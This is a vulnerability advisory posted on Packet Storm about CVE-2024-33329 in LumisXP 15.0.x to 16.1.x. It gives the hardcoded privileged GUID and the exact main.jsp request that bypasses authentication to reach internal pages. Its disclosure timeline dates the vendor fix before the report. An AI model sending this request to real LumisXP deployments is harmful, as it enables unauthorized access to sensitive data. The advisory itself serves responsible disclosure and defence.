what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

LumisXP 16.1.x Hardcoded Credentials / IDOR

LumisXP 16.1.x Hardcoded Credentials / IDOR
Posted Jul 11, 2024
Authored by Rodolfo Tavares | Site tempest.com.br

LumisXP versions 15.0.x through 16.1.x have a hardcoded privileged identifier that allows attackers to bypass authentication and access internal pages and other sensitive information.

tags | exploit
advisories | CVE-2024-33329
SHA-256 | 507655a40fa21c33f270fff3ee33944627b6c9719d3c667e8ec61677948d5b35

LumisXP 16.1.x Hardcoded Credentials / IDOR

Change Mirror Download
=====[ Tempest Security Intelligence - ADV-6/2024
]==========================

LumisXP v15.0.x to v16.1.x

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================

Overview
Detailed description
Timeline of disclosure
Thanks & Acknowledgements
References
=====[ Vulnerability
Information]=============================================

Class: Use of Hard-coded Credentials
('Use of Hard-coded Credentials') [CWE-798]
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - 5.3
=====[ Overview]========================================================

System affected : LumisXP
Software Version : Version - v15.0.x to v16.1.x
Impacts :
Vulnerability: A hardcoded privileged ID within Lumisxp v15.0.x to v16.1.x
allows attackers to bypass authentication and access internal pages and
other sensitive information
=====[ Detailed
description]=================================================

IDOR
http://localhost.com/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=
:
Access the link by inserting the GUID into the lumChannelId= parameter.
1 - Access your target using the following GUID (
00000000F00000000000000000000002 )
```
http://localhost.com/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=
```
2 - Verify that in the request response you will have access to various
component information and internal information about one or several domains.

=====[ Timeline of
disclosure]===============================================

2/Apr/2024 - Responsible disclosure was initiated with the vendor.
12/Apr/2024 - LumisXP Support confirmed the issue;
16/Fev/2024 - The vendor fixed the vulnerability
29/May/2024 - CVEs was assigned and reserved as CVE-2024-33329

=====[ Thanks & Acknowledgements]========================================

Tempest Security Intelligence [1]
Rodolfo Tavares
Niklas Correa
=====[ References ]=====================================================

[1][ https://cwe.mitre.org/data/definitions/798.html
[2][ https://www.tempest.com.br]
[3][Thanks Filipe X.]

=====[ EOF ]===========================================================

--

--

*Esta mensagem é para uso exclusivo de seu destinatário e pode conter
informações privilegiadas e confidenciais. Todas as informações aqui
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste
caso, por favor, notifique o remetente da mesma e destrua imediatamente a
mensagem.*

*
*
*This message is intended solely for the use of its
addressee and may contain privileged or confidential information. All
information contained herein shall be treated as confidential and shall not
be disclosed to any third party without Tempest’s prior written approval.
If you are not the addressee you should not distribute, copy or file this
message. In this case, please notify the sender and destroy its contents
immediately.**
*
*
*

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close